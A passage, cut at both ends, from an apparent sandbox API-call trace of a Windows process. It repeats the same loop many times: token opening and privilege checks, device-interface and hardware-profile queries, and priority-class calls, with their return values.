TokenHandle=0x18fe80*=0x0) returned 0 [0085.215] GetLastError () returned 0x3f0 [0085.215] GetCurrentProcess () returned 0xffffffff [0085.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.215] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.215] SetLastError (dwErrCode=0x522) [0085.215] CloseHandle (hObject=0x114) returned 1 [0085.215] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.216] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.216] GetLastError () returned 0x578 [0085.218] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.218] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.218] GetCurrentThread () returned 0xfffffffe [0085.218] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.218] GetLastError () returned 0x3f0 [0085.218] GetCurrentProcess () returned 0xffffffff [0085.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.218] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.218] SetLastError (dwErrCode=0x522) [0085.218] CloseHandle (hObject=0x114) returned 1 [0085.218] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.218] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.218] GetLastError () returned 0x578 [0085.218] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.218] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.218] GetCurrentThread () returned 0xfffffffe [0085.218] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.218] GetLastError () returned 0x3f0 [0085.218] GetCurrentProcess () returned 0xffffffff [0085.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.218] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.218] SetLastError (dwErrCode=0x522) [0085.218] CloseHandle (hObject=0x114) returned 1 [0085.218] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.218] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.218] GetLastError () returned 0x578 [0085.218] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.218] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.218] GetCurrentThread () returned 0xfffffffe [0085.218] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.218] GetLastError () returned 0x3f0 [0085.218] GetCurrentProcess () returned 0xffffffff [0085.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.219] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.219] SetLastError (dwErrCode=0x522) [0085.219] CloseHandle (hObject=0x114) returned 1 [0085.219] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.219] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.219] GetLastError () returned 0x578 [0085.219] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.219] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.219] GetCurrentThread () returned 0xfffffffe [0085.219] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.219] GetLastError () returned 0x3f0 [0085.219] GetCurrentProcess () returned 0xffffffff [0085.219] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.219] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.219] SetLastError (dwErrCode=0x522) [0085.219] CloseHandle (hObject=0x114) returned 1 [0085.219] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.219] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.219] GetLastError () returned 0x578 [0085.219] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.219] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.219] GetCurrentThread () returned 0xfffffffe [0085.219] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.219] GetLastError () returned 0x3f0 [0085.219] GetCurrentProcess () returned 0xffffffff [0085.219] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.220] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.220] SetLastError (dwErrCode=0x522) [0085.220] CloseHandle (hObject=0x114) returned 1 [0085.220] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.220] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.220] GetLastError () returned 0x578 [0085.220] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.220] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.220] GetCurrentThread () returned 0xfffffffe [0085.220] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.221] GetLastError () returned 0x3f0 [0085.221] GetCurrentProcess () returned 0xffffffff [0085.221] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.221] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.221] SetLastError (dwErrCode=0x522) [0085.221] CloseHandle (hObject=0x114) returned 1 [0085.221] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.221] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.221] GetLastError () returned 0x578 [0085.221] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.221] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.221] GetCurrentThread () returned 0xfffffffe [0085.221] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.221] GetLastError () returned 0x3f0 [0085.221] GetCurrentProcess () returned 0xffffffff [0085.221] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.221] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.221] SetLastError (dwErrCode=0x522) [0085.221] CloseHandle (hObject=0x114) returned 1 [0085.221] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.221] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.221] GetLastError () returned 0x578 [0085.221] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.221] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.221] GetCurrentThread () returned 0xfffffffe [0085.221] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.221] GetLastError () returned 0x3f0 [0085.221] GetCurrentProcess () returned 0xffffffff [0085.222] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.223] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.223] SetLastError (dwErrCode=0x522) [0085.223] CloseHandle (hObject=0x114) returned 1 [0085.223] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.223] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.223] GetLastError () returned 0x578 [0085.223] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.223] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.223] GetCurrentThread () returned 0xfffffffe [0085.223] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.223] GetLastError () returned 0x3f0 [0085.223] GetCurrentProcess () returned 0xffffffff [0085.223] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.223] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.223] SetLastError (dwErrCode=0x522) [0085.223] CloseHandle (hObject=0x114) returned 1 [0085.223] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.223] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.223] GetLastError () returned 0x578 [0085.223] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.223] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.223] GetCurrentThread () returned 0xfffffffe [0085.223] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.223] GetLastError () returned 0x3f0 [0085.223] GetCurrentProcess () returned 0xffffffff [0085.223] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.223] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.223] SetLastError (dwErrCode=0x522) [0085.223] CloseHandle (hObject=0x114) returned 1 [0085.223] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.223] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.223] GetLastError () returned 0x578 [0085.223] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.223] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.223] GetCurrentThread () returned 0xfffffffe [0085.223] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.223] GetLastError () returned 0x3f0 [0085.224] GetCurrentProcess () returned 0xffffffff [0085.224] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.224] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.224] SetLastError (dwErrCode=0x522) [0085.224] CloseHandle (hObject=0x114) returned 1 [0085.224] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.224] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.224] GetLastError () returned 0x578 [0085.224] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.224] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.224] GetCurrentThread () returned 0xfffffffe [0085.224] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.224] GetLastError () returned 0x3f0 [0085.224] GetCurrentProcess () returned 0xffffffff [0085.224] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.224] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.224] SetLastError (dwErrCode=0x522) [0085.224] CloseHandle (hObject=0x114) returned 1 [0085.224] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.224] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.224] GetLastError () returned 0x578 [0085.224] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.224] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.224] GetCurrentThread () returned 0xfffffffe [0085.224] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.224] GetLastError () returned 0x3f0 [0085.224] GetCurrentProcess () returned 0xffffffff [0085.224] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.224] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.224] SetLastError (dwErrCode=0x522) [0085.224] CloseHandle (hObject=0x114) returned 1 [0085.224] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.224] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.224] GetLastError () returned 0x578 [0085.224] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.224] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.224] GetCurrentThread () returned 0xfffffffe [0085.224] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.224] GetLastError () returned 0x3f0 [0085.225] GetCurrentProcess () returned 0xffffffff [0085.225] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.225] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.225] SetLastError (dwErrCode=0x522) [0085.225] CloseHandle (hObject=0x114) returned 1 [0085.225] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.225] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.225] GetLastError () returned 0x578 [0085.225] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.225] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.225] GetCurrentThread () returned 0xfffffffe [0085.225] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.225] GetLastError () returned 0x3f0 [0085.225] GetCurrentProcess () returned 0xffffffff [0085.225] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.225] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.225] SetLastError (dwErrCode=0x522) [0085.225] CloseHandle (hObject=0x114) returned 1 [0085.225] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.225] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.225] GetLastError () returned 0x578 [0085.225] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.225] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.225] GetCurrentThread () returned 0xfffffffe [0085.225] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.225] GetLastError () returned 0x3f0 [0085.225] GetCurrentProcess () returned 0xffffffff [0085.225] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.225] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.225] SetLastError (dwErrCode=0x522) [0085.225] CloseHandle (hObject=0x114) returned 1 [0085.225] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.225] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.225] GetLastError () returned 0x578 [0085.225] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.225] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.225] GetCurrentThread () returned 0xfffffffe [0085.225] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.225] GetLastError () returned 0x3f0 [0085.226] GetCurrentProcess () returned 0xffffffff [0085.226] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.226] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.226] SetLastError (dwErrCode=0x522) [0085.226] CloseHandle (hObject=0x114) returned 1 [0085.226] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.226] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.226] GetLastError () returned 0x578 [0085.226] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.226] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.226] GetCurrentThread () returned 0xfffffffe [0085.226] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.226] GetLastError () returned 0x3f0 [0085.226] GetCurrentProcess () returned 0xffffffff [0085.226] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.226] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.226] SetLastError (dwErrCode=0x522) [0085.226] CloseHandle (hObject=0x114) returned 1 [0085.226] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.226] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.226] GetLastError () returned 0x578 [0085.226] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.226] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.226] GetCurrentThread () returned 0xfffffffe [0085.226] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.226] GetLastError () returned 0x3f0 [0085.226] GetCurrentProcess () returned 0xffffffff [0085.226] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.226] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.226] SetLastError (dwErrCode=0x522) [0085.226] CloseHandle (hObject=0x114) returned 1 [0085.226] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.226] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.226] GetLastError () returned 0x578 [0085.226] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.226] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.226] GetCurrentThread () returned 0xfffffffe [0085.226] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.226] GetLastError () returned 0x3f0 [0085.227] GetCurrentProcess () returned 0xffffffff [0085.227] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.227] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.227] SetLastError (dwErrCode=0x522) [0085.227] CloseHandle (hObject=0x114) returned 1 [0085.227] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.227] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.227] GetLastError () returned 0x578 [0085.227] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.227] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.227] GetCurrentThread () returned 0xfffffffe [0085.227] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.227] GetLastError () returned 0x3f0 [0085.227] GetCurrentProcess () returned 0xffffffff [0085.227] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.227] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.227] SetLastError (dwErrCode=0x522) [0085.227] CloseHandle (hObject=0x114) returned 1 [0085.227] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.227] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.227] GetLastError () returned 0x578 [0085.227] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.227] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.227] GetCurrentThread () returned 0xfffffffe [0085.227] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, 